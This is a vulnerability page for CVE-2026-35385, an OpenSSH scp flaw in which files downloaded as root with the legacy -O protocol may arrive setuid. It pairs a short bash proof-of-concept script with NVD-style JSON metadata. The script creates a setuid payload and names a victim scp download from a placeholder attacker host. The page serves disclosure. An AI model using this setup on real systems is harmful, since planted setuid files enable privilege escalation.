CVE-2026-35385

#!/bin/bash # PoC Concept for CVE-2026-35385 # Scenario: Attacker prepares a malicious file with setuid root on a server. # Victim (root) downloads it using vulnerable scp. # 1. On the attacker-controlled machine (or server), create a malicious file # that acts as a setuid binary. # (Assuming the attacker has root on the source machine to set the bit initially) echo "[+] Creating malicious payload on remote server..." cat > /tmp/malicious_payload.sh << 'EOF' #!/bin/bash echo "If you see this as root, the exploit worked." whoami EOF # Set setuid and executable permissions (simulating the source file state) chmod 4755 /tmp/malicious_payload.sh # 2. Victim Action: The victim (root) runs scp with -O flag. # Command: # scp -O user@attacker_ip:/tmp/malicious_payload.sh ./ echo "[+] Victim command: scp -O user@attacker:/tmp/malicious_payload.sh ./" echo "[+] After download, checking local file permissions..." # Simulated result on victim machine: # -rwsr-xr-x 1 root root ... malicious_payload.sh echo "[!] The file is now setuid root on the local system." echo "[!] Executing the downloaded file..." # ./malicious_payload.sh

{"cve": {"id": "CVE-2026-35385", "sourceIdentifier": "[email protected]", "published": "2026-04-02T17:16:27.450", "lastModified": "2026-04-27T14:02:23.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In OpenSSH before 10.3, a file downloaded by scp may be installed setuid or setgid, an outcome contrary to some users' expectations, if the download is performed as root with -O (legacy scp protocol) and without -p (preserve mode)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-281"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.3", "matchCriteriaId": "F40F50BC-86AA-4D7F-88A5-A244CD7606F3"}]}]}], "references": [{"url": "https://marc.info/?l=openssh-unix-dev&m=177513443901484&w=2", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.openssh.org/releasenotes.html#10.3p1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/04/02/3", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}